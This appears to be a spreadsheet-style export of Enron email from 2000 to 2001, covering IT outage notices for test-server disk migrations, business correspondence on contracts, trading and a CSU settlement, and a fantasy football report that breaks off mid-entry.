Outage: Test/Dev maintenance weekend, server Salmon_x000D_
Environments Impacted: CAS, CPR, DCAF-2, ECM, EIM, Global, Infinity, MKM, PEP, POPS _x000D_
Purpose: Migrate to the new more efficient disk layout with enhanced performance now that testing is complete._x000D_
Backout: Restore original disklayout. Restore data from backup storage._x000D_
Contact(s):  Dolan, Michael713-345-3251_x000D_
                    Wells, Malcolm713-345-3716_x000D_
 _x000D_
Impact: Corp_x000D_
Time: Thur 11/22/2001 at  6:00:00 AM CT thru Fri 11/23/2001 at  12:00:00 AM CT_x000D_
	Thur 11/22/2001 at  4:00:00 AM PT thru Thur 11/22/2001 at 10:00:00 PM PT_x000D_
	Thur  11/22/2001 at  12:00:00 PM London thru Fri 11/23/2001 at  6:00:00 AM London _x000D_
Outage: Test / Dev disk re layouts, Server Charon_x000D_
Environments Impacted: OPM, EnLighten, RAM _x000D_
Purpose: Migrate to the new more efficient disk layout with enhanced performance now that testing is complete._x000D_
Backout: Restore original disklayout. Restore data from backup storage._x000D_
Contact(s):  Dolan, Michael713-345-3251_x000D_
                   Wells, Malcolm713-345-3716_x000D_
 _x000D_
Impact: Corp_x000D_
Time: Sat 11/24/2001 06:00 PM thru Sun 11/25/2001 6:00 AM CT_x000D_
           Sat 11/24/2001 04:00 PM thru Sun 11/25/2001 4:00 AM PT_x000D_
           Sun 11/25/2001 00:00 AM thru Sun 11/25/2001 12:00 PM London_x000D_
Outage: Test / Dev disk re layouts, server Ferrari_x000D_
Environments Impacted: CPR,EnPower, OMS (Yantra), Power-Exotic, SIEBEL, POPS _x000D_
Purpose: Migrate to the new more efficient disk layout with enhanced performance now that testing is complete._x000D_
Backout: Restore original disklayout. Restore data from backup storage._x000D_
Contact(s):  Dolan, Michael713-345-3251_x000D_
                    Wells, Malcolm713-345-3716_x000D_
 _x000D_
Impact: Corp_x000D_
Time: Sat 11/24/2001 06:00 PM thru Sun 11/25/2001 6:00 AM CT_x000D_
           Sat 11/24/2001 04:00 PM thru Sun 11/25/2001 4:00 AM PT_x000D_
           Sun 11/25/2001 00:00 AM thru Sun 11/25/2001 12:00 PM London_x000D_
Outage: Test / Dev disk re layouts for astral_x000D_
Environments Impacted: DCAF3, EQUITIES, Phoenix, RMS, SITARA - OLTP, Infinity, ECM _x000D_
Purpose: Migrate to the new more efficient disk layout with enhanced performance now that testing is complete._x000D_
Backout: Restore original disklayout. Restore data from backup storage._x000D_
Contact(s):  Dolan, Michael713-345-3251_x000D_
                    Wells, Malcolm713-345-3716_x000D_
 _x000D_
Impact: Corp_x000D_
Time: Sat 11/24/2001 06:00 PM thru Sun 11/25/2001 6:00 AM CT_x000D_
           Sat 11/24/2001 04:00 PM thru Sun 11/25/2001 4:00 AM PT_x000D_
           Sun 11/25/2001 00:00 AM thru Sun 11/25/2001 12:00 PM London_x000D_
Outage: Test / Dev disk re layouts for titania_x000D_
Environments Impacted: CAS, Custom Logs (CEI), Equities, Estreme Relocation, Global, Government Affairs, POPS, SIEBEL _x000D_
Purpose: Migrate to the new more efficient disk layout with enhanced performance now that testing is complete._x000D_
Backout: Restore original disklayout. Restore data from backup storage._x000D_
Contact(s):  Dolan, Michael713-345-3251_x000D_
                    Wells, Malcolm713-345-3716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Wed, 12 Apr 2000 06:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'egert_steve@emc.com', 'dloon@uschamber.com', 'tony@digitrain.com', 'rlfossum@mato.com', 'sackreiter@randolph.af.mil'})</t>
  </si>
  <si>
    <t>FW: Jet exhaust</t>
  </si>
  <si>
    <t xml:space="preserve">This is too cool to be believed.  Obviously, I'm not getting much _x000D_
accomplished at work today.  Adios, DF_x000D_
_x000D_
_x000D_
_x000D_
&gt; Subject:  FW: Jet exhaust_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; ----------_x000D_
&gt;  &lt;&lt;fod5.mpg&gt;&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
 - fod5.mpg_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 02:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FYI From Marty Sunde: Request for Ken to contact Chancellor Reed,_x000D_
 California State University System</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Steven J Kean/NA/Enron on 05/10/2001 _x000D_
09:28 AM ---------------------------_x000D_
From: Carol Moffett@EES on 05/09/2001 08:49 AM_x000D_
To: Steven J Kean/NA/Enron@Enron, Greg Whalley/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: FYI From Marty Sunde:  Request for Ken to contact Chancellor Reed, _x000D_
California State University System_x000D_
_x000D_
FYI...._x000D_
---------------------- Forwarded by Carol Moffett/HOU/EES on 05/09/2001 08:48 _x000D_
AM ---------------------------_x000D_
_x000D_
	Enron Energy Services_x000D_
	_x000D_
	From:  Marty Sunde                           05/09/2001 08:16 AM_x000D_
	Phone No: 713 853-7797 Phone_x000D_
  888-953-9478 SkyTel Pager_x000D_
  EB 889_x000D_
	_x000D_
_x000D_
_x000D_
_x000D_
To: Rosalee Fleming/Corp/Enron@ENRON_x000D_
cc: Tom Riley/Western Region/The Bentley Company@Exchange, Vicki _x000D_
Sharp/HOU/EES@EES, Lamar Frazier/HOU/EES@EES, David W Delainey/HOU/EES@EES _x000D_
(bcc: Carol Moffett/HOU/EES)_x000D_
Subject: Request for Ken to contact Chancellor Reed, California State _x000D_
University System_x000D_
_x000D_
Rosalee,_x000D_
_x000D_
I have left Ken a voicemail request but thought I would follow up with a note _x000D_
to you that might help clarify the request._x000D_
_x000D_
As Ken knows, Enron Energy Services recently won a STAY by the 9th Circuit _x000D_
Court of an order by a lower court to require us to provide electricity _x000D_
service to the UC/CSU systems directly versus via using PG&amp;E and SCE _x000D_
service.  The formal court hearing of the appeal is still scheduled for 60 to _x000D_
90 days from now.  _x000D_
We would like Ken to phone Charlie Reed, Chancellor of CSU,  and solicit _x000D_
Charlie's support for Enron, CSU, and the UC system to get back together to _x000D_
attempt to work out a commercial resolution to these issues.  _x000D_
We believe that sponsorship and support coming from the most senior _x000D_
executives' offices will help bring the parties together.  _x000D_
Additionally, if CSU and UC are interested in working out a settlement, we _x000D_
would like to solicit their joint request for a delay in the court calendar.  _x000D_
This would allow both teams to focus on a commercial resolution versus _x000D_
splitting their focus between a settlement and preparing briefs for the _x000D_
appeal appearance.  We would like to see a delay request of one month, as _x000D_
long as the setttlement discussions progress.  _x000D_
A desirable way to kick off settlement discussions would be to ask Ken to _x000D_
have lunch with the Head of UC , Charlie Reed of CSU, and perhaps one _x000D_
business lead (in this case, this could be me).  I am not sure that Ken's _x000D_
schedule could accomadate that, but I thought I would ask.  If timing is bad _x000D_
for a meeting like this, we can find a different alternative.    _x000D_
_x000D_
I will follow up with a phone call to you.  Hope this helps._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Feb 2001 04:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jjorge@isda.org'})</t>
  </si>
  <si>
    <t>frozenset({'marussel@srpnet.com', 'sara.shackleton@enron.com'})</t>
  </si>
  <si>
    <t>Confirmation of registration for March 6,2001 ISDA conference</t>
  </si>
  <si>
    <t>&gt; Please download the attached it confirms that you have been registered to_x000D_
&gt; attend the ISDA March 6,2001 conference in Houston. If you have any_x000D_
&gt; further questions please feel free to call me at 212 332 1209._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;  &lt;&lt;houstonenergyconf.doc&gt;&gt;_x000D_
&gt; Regards,_x000D_
&gt; Jean_x000D_
_x000D_
 - houstonenergyconf.doc</t>
  </si>
  <si>
    <t>Mon, 19 Mar 2001 14:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: CONFERENCE CALL - Next Thursday - Turbine Purchase Agmnts</t>
  </si>
  <si>
    <t xml:space="preserve">Did I send this to you yet?_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 03/19/2001 10:30 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Barton Clark@ECT_x000D_
03/19/2001 03:16 PM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: CONFERENCE CALL - Next Thursday - Turbine Purchase Agmnts  _x000D_
_x000D_
I had thought I would be the lawyer on the Mitsubishi consent, until I was _x000D_
removed two weeks ago in favor of Rose. Then I heard today from Ozzie that _x000D_
Rose was off and another ENA lawyer ( I don't know who) was heading up the _x000D_
effort with Mitsubishi. I didn't suggest you get involved, and as you can see _x000D_
I wasn't copied on any of the arrangements ( until you forwarded them to me _x000D_
). I think this is by design, as Ozzie has asked that I  focus my time on _x000D_
finalizing arrangements with FPUA, FMPA and Turbo Park. _x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	03/15/2001 04:29 PM_x000D_
		 _x000D_
		 To: Barton Clark/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: CONFERENCE CALL - Next Thursday - Turbine Purchase Agmnts_x000D_
_x000D_
I'm not planning to get involved since this is your deal.  Is that ok with _x000D_
you?_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 03/15/2001 04:29 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
	Lorie Leigh @ ECT_x000D_
	03/15/2001 04:17 PM_x000D_
	_x000D_
To: Roseann Engeldorf/Enron@EnronXGate, Lisa Bills/Enron@EnronXGate, Kay _x000D_
Mann/Corp/Enron@Enron, Brett R Wiggs/SA/Enron@Enron, Ben F _x000D_
Jacoby/HOU/ECT@ECT, Mike Coleman/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: CONFERENCE CALL - Next Thursday - Turbine Purchase Agmnts_x000D_
_x000D_
_x000D_
_x000D_
Conference Plus will be hosting this call:_x000D_
_x000D_
the date:  Thursday, March 22nd, 2001_x000D_
the number:  1-800-991-9019_x000D_
the passcode: 6871082#_x000D_
the time:  10:00 AM - 11:00 AM CST_x000D_
the place:  EB 3143C_x000D_
the subject:  Turbine 1 and Turbine 2 Purchase Agreement_x000D_
 _x000D_
If you have any problems or questions, please feel free to call me at _x000D_
713-853-1696._x000D_
_x000D_
Thank you,_x000D_
Lorie Leigh_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 10:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>The spreadsheet for Talon deal</t>
  </si>
  <si>
    <t>Vince,_x000D_
_x000D_
Here is the spreadsheet for your review._x000D_
_x000D_
_x000D_
Thanks._x000D_
_x000D_
Rakesh</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 09:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lbracken@summitenergy.com'})</t>
  </si>
  <si>
    <t>Follow Up</t>
  </si>
  <si>
    <t>Kim_x000D_
Talked to SSCC today regarding natural gas contracts for  CA.? _x000D_
Wanted a summary from Enron on pricing you could provide  for_x000D_
1) Month to month deal for all facilities_x000D_
2)? One year term deal for all facilities less LA Vernon  and month-month for _x000D_
LA Vernon._x000D_
3) One year for all facilities._x000D_
I know that the box plants are benefiting from LA Vernon on  the Index _x000D_
deal.?Too many variables still exist to lock into long term Index  deal for _x000D_
LA Vernon.? Can you price them separately?_x000D_
Lynn_x000D_
***********************************_x000D_
?_x000D_
Lynn Bracken_x000D_
Energy Manager_x000D_
Summit Energy Services,  Inc._x000D_
9920 Corporate Campus Drive_x000D_
Suite 2000_x000D_
Louisville, KY  40223_x000D_
502-429-3800</t>
  </si>
  <si>
    <t>Wed, 10 May 2000 10:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'david.foti@enron.com', 'rich.jolly@enron.com'})</t>
  </si>
  <si>
    <t>WT-1 Electric Service Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Rich and Dave, attached are my suggested revisions to Mike McLeod's draft of _x000D_
an amendment to the original electric service agreement.  Dave, I'll bring _x000D_
you a copy of that agreement.  Rich, if Mike did not send you one, let me _x000D_
know and I will fax it to you.  _x000D_
_x000D_
In my revisions, I've attempted to reflect the least cost billing you _x000D_
described to me, using terminology I read in the tariff.  Please let me know _x000D_
if it looks alright to you.  I'm available to discuss this whenever you are, _x000D_
then I will make sending this to Mike top priority.  My sincerest apologies _x000D_
for the delay; there has been more chaos around here than I am accustomed to _x000D_
handling, and I appreciate your patience._x000D_
_x000D_
Susan_x000D_
x30596_x000D_
</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 21:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'colleen.sullivan@enron.com', 'stephen.stock@enron.com', 'louise.kitchen@enron.com', 'philippe.bibi@enron.com', 'beth.perlman@enron.com', 'geoff.storey@enron.com'})</t>
  </si>
  <si>
    <t>Inception Document for GTV II phase II</t>
  </si>
  <si>
    <t xml:space="preserve">Attached please find the Inception Document for Gas Trading Vision II Phase II. I would appreciate your comments. I will be circulating the document for signatures on Wednesday. Please provide your inputs by then._x000D_
_x000D_
Thanks_x000D_
_x000D_
Zhiyong_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 11:33:31 -0800 (PST)</t>
  </si>
  <si>
    <t>Holiday Weekend</t>
  </si>
  <si>
    <t>hey holly,_x000D_
_x000D_
just wanted to see what's going on with you, and to inquire how the long weekend in whistler went...i'm curious to hear how everything played out.  also, bonnie wanted to get the name of the guy you knew who's based down in tacoma and went to west point._x000D_
_x000D_
drop me a line when you get a chance._x000D_
_x000D_
Susan</t>
  </si>
  <si>
    <t>Fri, 23 Feb 2001 08:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: As expected!</t>
  </si>
  <si>
    <t xml:space="preserve">I just spoke with Justin about collaborating on the ICE and EOL volume _x000D_
reports. He doesn't actually have access to ICE data right now, but has _x000D_
requested it from staff at the exchange. He's not sure of the exact day he _x000D_
might begin receiving this report, but told me it would be sometime next _x000D_
week. I'll let you know when I find out. _x000D_
_x000D_
Also, do you want this report simply added to the end of the EOL Summary, or _x000D_
would you like the information integrated into the tables that show our _x000D_
volumes? Let me know when you have a moment._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Tim Belden                           02/23/2001 01:43 PM_x000D_
	_x000D_
_x000D_
To: Justin Rostant/HOU/ECT@ECT_x000D_
cc: Kate Symes/PDX/ECT@ECT _x000D_
_x000D_
Subject: As expected!_x000D_
_x000D_
justin,_x000D_
i received this e-mail from louise today with information on ice volumes.  i _x000D_
would like to get a daily extract of number of ice trades and volume for _x000D_
western power delivery points.  kate symes prepares a daily summary of our _x000D_
eol volume for me.  could you please coordinate with kate so that we can get _x000D_
the ice information into our reports.  thanks for your help.  give me a call _x000D_
at 503-464-3820 if you have any questions._x000D_
_x000D_
regards,_x000D_
tim_x000D_
---------------------- Forwarded by Tim Belden/HOU/ECT on 02/23/2001 12:41 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Louise Kitchen_x000D_
02/23/2001 11:26 AM_x000D_
To: Kevin M Presto/HOU/ECT@ECT, Tim Belden/HOU/ECT@ECT_x000D_
cc: John J Lavorato/Enron@EnronXGate _x000D_
Subject: As expected!_x000D_
_x000D_
I am sure you expected me to comment on EOL at some point - but just in case _x000D_
you don't see the attached reporting.  Essentially in power we are now doing _x000D_
the same volume as the Intercontinental Exchange.  If you want reports like _x000D_
this, Justin Rostant can produce whatever you wish._x000D_
_x000D_
Yesterday:_x000D_
ICE   1,892,800 MWhs_x000D_
EnronOnline 1,843,874 MWhs (plus 124,850 MWhs financial)_x000D_
_x000D_
See attached._x000D_
_x000D_
Regards_x000D_
_x000D_
Louise_x000D_
_x000D_
_x000D_
(i) ICE _x000D_
 _x000D_
_x000D_
(ii) EnronOnline_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 22 Nov 2000 03:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Drew -- I worked with Jeff on this draft so it already contains my comments._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Drew Fossum                           11/21/2000 02:30 PM_x000D_
	_x000D_
_x000D_
To: Susan Scott/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Proposal to Caithness Big Sandy_x000D_
_x000D_
pls give me your comments next week..  thanks  df_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 11/21/2000 _x000D_
02:29 PM ---------------------------_x000D_
_x000D_
_x000D_
Jeffery Fawcett_x000D_
11/21/2000 01:17 PM_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON, Steven Harris/ET&amp;S/Enron@ENRON, Kevin _x000D_
Hyatt/ET&amp;S/Enron@Enron_x000D_
cc: Susan Scott/ET&amp;S/Enron@ENRON, Keith Petersen/ET&amp;S/Enron@ENRON, Ronald _x000D_
Matthews/ET&amp;S/Enron@ENRON, Rod Hayslett/FGT/Enron@ENRON, James _x000D_
Centilli/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Proposal to Caithness Big Sandy_x000D_
_x000D_
Attached for your review and comment is a broad outline of a rate proposal to _x000D_
Caithness for the construction and operation of the 40-mile lateral to the _x000D_
Big Sandy project.  This non-binding proposal was requested by Caithness' _x000D_
consultant, George Briden, as a starting point for modeling the economics of _x000D_
the project's gas supply and a basis for further discussions aimed at _x000D_
designing an appropriate deal structure.  For your information, James _x000D_
Centilli calculated the transport rate based on the (+/- 30%) $20.33MM cost _x000D_
estimate with a ten-year (contract) amortization.  _x000D_
_x000D_
I plan to put this in the mail by the close of business tomorrow.  If you _x000D_
have any suggestions, please let me hear from you by mid-day.   Thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 02:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: DealBench virtual data-rooms</t>
  </si>
  <si>
    <t xml:space="preserve">Don, give Harry some $$'s_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 12/05/2000 _x000D_
10:44 AM ---------------------------_x000D_
_x000D_
_x000D_
Jeff Donahue_x000D_
12/05/2000 08:46 AM_x000D_
To: Don Miller/HOU/ECT@ECT_x000D_
cc: David W Delainey/HOU/ECT@ECT _x000D_
Subject: Re: DealBench virtual data-rooms  _x000D_
_x000D_
Don:_x000D_
_x000D_
I do think DealBench was extremely valuable - and I'll say we - ENA - but _x000D_
what I really mean is you could not have gotten there nearly as quickly _x000D_
without it.  I think you agree.  By the same token, if they said 'free' up _x000D_
front, we don't have to pay.  I think this is really a negotiation between _x000D_
Dave and Greg if we want to move income to DealBench._x000D_
_x000D_
Jeff _x000D_
_x000D_
_x000D_
_x000D_
Don Miller_x000D_
12/04/2000 03:17 PM_x000D_
To: Jeff Donahue/HOU/ECT@ECT_x000D_
cc: David W Delainey/HOU/ECT@ECT _x000D_
Subject: DealBench virtual data-rooms_x000D_
_x000D_
Jeff,_x000D_
_x000D_
What are your thought on this?  Let's talk about it._x000D_
_x000D_
Don_x000D_
---------------------- Forwarded by Don Miller/HOU/ECT on 12/04/2000 03:08 PM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Harry Arora                           12/04/2000 02:23 PM_x000D_
	_x000D_
_x000D_
To: Don Miller/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: DealBench virtual data-rooms_x000D_
_x000D_
_x000D_
Don_x000D_
_x000D_
Congrats on your deals. JinSung had apprised me that things went well and in _x000D_
San Antonio I ran into Dave Delainey and he was very happy with the whole _x000D_
thing._x000D_
_x000D_
With the current NetWorks structure, and considering the benefits you have _x000D_
derived, we want to charge you a nominal amount for each of these data _x000D_
rooms.  We want to bill you 25k for each data room for a total of 175k._x000D_
_x000D_
I know that at the beginning of the deal you had asked me this question and _x000D_
my answer was 'we aint charging you' but the business model for us has _x000D_
changed and we need to show revenues and income to external customers and _x000D_
external partners we are trying to get to.  Hence we want to bill internal _x000D_
customers whatever is the reasonable price of the service offered._x000D_
_x000D_
I will call you later to discuss ( I did mention to Dave in San Antonio I was _x000D_
going to have to do this, considering my business situation)_x000D_
_x000D_
_x000D_
_x000D_
Harry_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 13:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sharad.agnihotri@enron.com'})</t>
  </si>
  <si>
    <t>Re: Gas Implied Volatility Smile</t>
  </si>
  <si>
    <t xml:space="preserve">unfortunately, mathematical analysis of skew is extremely hard to do.  the _x000D_
question is why does skew exist and does the market do a proper job of _x000D_
correcting for violations of the black scholes model.  in my mind, there are _x000D_
three big reasons for skew.  one is that the assumption of stochastic _x000D_
volatility as a function of price level gets violated.  commodities tend to _x000D_
have long range trading ranges that exist due to the economics of supply and _x000D_
elasticity of the demand curve.  nat gas tends to be relatively stable when _x000D_
we are in that historical pricing environment.  however, moving to a _x000D_
different pricing regime tends to bring volatility.  an options trader wants _x000D_
to be long vol outside the trading range, believing that a breakout of the _x000D_
range leads to volatility while trying to find new equilibrium.  supports a _x000D_
vol smile theory.  in addition, in some commodities realized vol is a _x000D_
function of price level.  nat gas historically is more volatile at $5 than at _x000D_
$4 and more volatile at $4 than $3.  thus there has been a tendency for all _x000D_
calls to have positive skew and all puts except weenies to have negative _x000D_
skew.  the market certainly trades this way as vol has a tendency to come off _x000D_
in a declining market and increase in a rising market.  to test, regress 15 _x000D_
day realized vol versus price level and see if there is any correlation.  _x000D_
second reason is heptocurtosis, fatter tails than lognormal distribution _x000D_
predicts.  supports vol smile theory.  easy to test how your market compares _x000D_
by plotting historical one day lognormal returns versus expected _x000D_
distribution.  _x000D_
third, is just supply and demand.  in a market where spec players are _x000D_
bearish, put skew tends to get bid as vol players require more insurance _x000D_
premium to add incremetal risk to the book.  if you have a neutral view _x000D_
towards market, or believe that market will come off but in an orderly _x000D_
fashion, enron can take advantage of our risk limits by selling more _x000D_
expensive insurance.  crude market tends to have strong put skew and weak _x000D_
call skew as customer business in options is nearly all one way: producer _x000D_
fences.  if you believe vol is stochastic in the region of prices where the _x000D_
fence strikes are, can be profitable to take other side of trade.  _x000D_
if you want to discuss further give me a call 4-6 pm houston time.  hope this _x000D_
helps,_x000D_
john_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sharad Agnihotri_x000D_
04/04/2001 12:44 PM_x000D_
To: Mike Maggi/Corp/Enron@Enron, John Arnold/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Gas Implied Volatility Smile_x000D_
_x000D_
John, Mike_x000D_
_x000D_
I work for the London Research team and am looking at _x000D_
some option pricing problems for the UK gas desk._x000D_
Dave Redmond the options trader told me that you had done _x000D_
some fundamental research regarding _x000D_
the gas implied volatility smiles and may be able to help._x000D_
_x000D_
I would be grateful if you tell me _x000D_
what you have done or suggest _x000D_
someone else that I could ask._x000D_
_x000D_
Regards_x000D_
Sharad Agnihtori _x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 21 Aug 2001 15:24:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>City of Mesa Contract</t>
  </si>
  <si>
    <t>_x000D_
Kim,_x000D_
_x000D_
Just in case the counterparty comes back to you and still can't find their copy of the contract - here is ours:_x000D_
_x000D_
 _x000D_
_x000D_
Best regards,_x000D_
Ellen_x000D_
x54099</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 06:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'irena.hogan@enron.com'})</t>
  </si>
  <si>
    <t>Re: Shell Houston Open</t>
  </si>
  <si>
    <t>That will be great._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Commissioner.COM E-Reports for Big E 12/11/00</t>
  </si>
  <si>
    <t xml:space="preserve">[IMAGE]_x000D_
_x000D_
_x000D_
SuperBowl.com Playoff Challenge -- Experience the NFL playoffs like never _x000D_
before. Select a team of 8 players and follow their performance from Wild _x000D_
Card week to the Big Game on Jan. 28. Maybe your team will be the big winner _x000D_
come Super Bowl Sunday! Click here to play for FREE._x000D_
_x000D_
The tab for SportsLine's FREE Fantasy Football is being picked up by Miller _x000D_
Lite, our favorite beer around here. Check them out offline at your local bar _x000D_
or online with us. Grab a Miller Lite. It's Miller Time!_x000D_
_x000D_
Half time at the Super Bowl doesn't offer you more fireworks than the savings _x000D_
at Half.com.  Check out Half.com for HALF price on Music, Books, Movies &amp; _x000D_
Games!_x000D_
_x000D_
Win The Fantasy Football Trip Of A Lifetime! Love to surf the _x000D_
cbs.sportsline.com site? You could win a 4-day/3-night weekend in Florida to _x000D_
attend Cris Carter's FAST Program in Florida! Click here to get started now!_x000D_
_x000D_
_x000D_
_x000D_
Brought to you by_x000D_
_x000D_
_x000D_
_x000D_
Sponsorship Bar_x000D_
You are receiving these e-reports because you have signed up for CBS _x000D_
SportsLine Fantasy Football.  To customize, reschedule, or turn off these _x000D_
reports please  click here _x000D_
_x000D_
_x000D_
_x000D_
 Player Updates?NFL Reports? _x000D_
 Latest NFL Player News _x000D_
_x000D_
 Troy Aikman , QB DAL - Free Agent Updated 12/11/00 _x000D_
 Aikman left Sunday's game against the Redskins with yet another concussion.  _x000D_
He looked dazed on the sidelines and is reportedly still suffering from _x000D_
dizziness and other symptoms caused by concussions. With only two games _x000D_
remaining in the season, don't be surprised if Aikman has seen his last snap _x000D_
of the year - and maybe his career. Fantasy owners need to look elsewhere _x000D_
than Dallas to find a quarterback worthy of starting during their playoffs.   _x000D_
_x000D_
 Ray Lucas , QB NYJ - Free Agent Updated 12/10/00 _x000D_
 Lucas replaced an injured Vinny Tesatverde (groin) in the third quarter of _x000D_
Sunday's game at Oakland. Chad Pennington also saw action at QB in the game's _x000D_
final quarter.  _x000D_
_x000D_
 Torry Holt , WR STL - Fear Updated 12/10/00 _x000D_
 On nine catches, Holt racked up 172 yards. With Kurt Warner returning to _x000D_
form, Holt should be able to maintain a high level of play during the final _x000D_
rounds of the Fantasy playoffs.  _x000D_
_x000D_
 Aaron Brooks , QB NO - Free Agent Updated 12/10/00 _x000D_
 Though he completed just 12 of 28 passes, Brooks passed for 203 yards with _x000D_
two touchdowns and no interceptions, and also ran 11 times for 108 yards. _x000D_
Brooks has suddenly emerged as a surprising two-way threat just in time for _x000D_
the Fantasy playoffs.       _x000D_
_x000D_
 Jacquez Green , WR TB - Hunter Shively Updated 12/10/00 _x000D_
 The Tampa Bay wideout failed to record a catch against Miami. After some _x000D_
early-season heroics, Green has proved he doesn't deserve to start on any _x000D_
Fantasy team during the postseason.      _x000D_
_x000D_
 Vinny Testaverde , QB NYJ - Fear Updated 12/10/00 _x000D_
 With the Jets trailing 21-0, Testaverde injured his groin and was replaced _x000D_
by Ray Lucas in the third quarter of Sunday night's game at Oakland. Lucas _x000D_
threw an interception on his first drive and was briefly replaced by Chad _x000D_
Pennington on the Jets' next possession before finishing the series.   _x000D_
_x000D_
 Brett Favre , QB GB - The Klap Updated 12/10/00 _x000D_
 The Packers' quarterback completed just 15 of 36 passes for 208 yards with _x000D_
one touchdown, one interception and a lost fumble. If you advance to the next _x000D_
round, you may want to sit Favre, who has run hot and cold during Green Bay's _x000D_
recent resurgence.  _x000D_
_x000D_
 James Allen , RB CHI - Eric Bass Updated 12/10/00 _x000D_
 Topping 1,000 yards for the season, Allen ran for 97 yards and a touchdown _x000D_
on 37 carries. He also caught a TD pass. Allen played well against the lowly _x000D_
Patriots, but you still might not be able to consistently depend on him as a _x000D_
Fantasy starter during the postseason.    _x000D_
_x000D_
 Darnell Autry , RB PHI - Martin Cuilla Updated 12/10/00 _x000D_
 Despite scoring the Eagles' initial touchdown, Autry ran for just 28 yards _x000D_
on 10 carries. Newly-signed Chris Warren did not play, but Autry certainly _x000D_
feels Warren's shadow looming over him and might see his playing time _x000D_
seriously slip in the final two games.  _x000D_
_x000D_
 Ron Dayne , RB NYG - Martin Cuilla Updated 12/10/00 _x000D_
 The rookie back picked up just 20 yards on 11 carries. Don't trust him _x000D_
during these important final weeks. Dayne has been much too inconsistent this _x000D_
season.  _x000D_
_x000D_
 Emmitt Smith , RB DAL - Rocks Updated 12/10/00 _x000D_
 On 23 carries, Smith ran for 150 yards and a touchdown. Smith looked like he _x000D_
was in his prime, evading tacklers, pushing them over and exploding away from _x000D_
them. He still has the tools to be an integral part of a Fantasy title team.  _x000D_
_x000D_
 Michael Pittman , RB ARI - Martin Cuilla Updated 12/10/00 _x000D_
 On 11 carries, Pittman ran for minus one yard. If Jake Plummer continues to _x000D_
battle injuries, opponents will tee off on Pittman. Thomas Jones also looked _x000D_
good in garbage time and very well could see more playing time in the final _x000D_
two games.  _x000D_
_x000D_
 Sean Dawkins , WR SEA - Free Agent Updated 12/10/00 _x000D_
 On six catches, Dawkins finished with 85 yards and a pair of touchdowns. As _x000D_
expected, he took advantage of the awful Denver secondary but he is still not _x000D_
a reliable starter during the Fantasy playoffs.   _x000D_
_x000D_
 Tony Richardson , RB KC - Top Dogs Updated 12/10/00 _x000D_
 While running for 89 yards on 17 carries, Richardson added eight catches for _x000D_
56 yards. He should keep the starting halfback job in Kansas City for the _x000D_
season's final two games.   _x000D_
_x000D_
 Eddie George , RB TEN - Fear Updated 12/10/00 _x000D_
